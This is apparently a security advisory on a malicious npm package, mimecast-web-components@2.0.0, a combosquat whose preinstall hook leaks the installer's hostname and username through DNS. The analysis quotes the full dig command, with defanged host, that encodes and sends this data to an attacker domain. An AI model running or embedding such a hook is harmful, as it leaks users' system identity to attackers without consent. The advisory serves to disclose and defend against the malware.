LWA-2026-3975 MAL-2026-3618 ↗ confirmed malware

mimecast-web-components@2.0.0

Malicious code in mimecast-web-components (npm)

T1059 · Command and Scripting InterpreterT1082 · System Information DiscoveryT1071.004 · DNST1041 · Exfiltration Over C2 Channel

Analysis

mimecast-web-components is a combosquat dummy package whose preinstall hook performs DNS-based host-fingerprint exfiltration: it runs dig +short "$(echo c-$(hostname)-$(whoami) | base32 | tr -d '=' | rev).canary[.]rebind[.]fun[.]offensive[.]work", encoding the victim's hostname and username into a subdomain query to an attacker-controlled DNS endpoint. The index.js is a 5-line dummy stub disguising the package as combosquat prevention. The DNS exfiltration is a recon beacon that leaks installer identity to the attacker's infrastructure.

analyzed by
Leitwacht
first seen
Jun 10, 2026, 05:32 PM
analyzed
Jun 10, 2026, 05:32 PM

Related advisories

browse all confirmed advisories →

Independently detected by the Leitwacht supply-chain probe. IOCs are defanged. Published CC0. Think this is a mistake? See the dispute policy.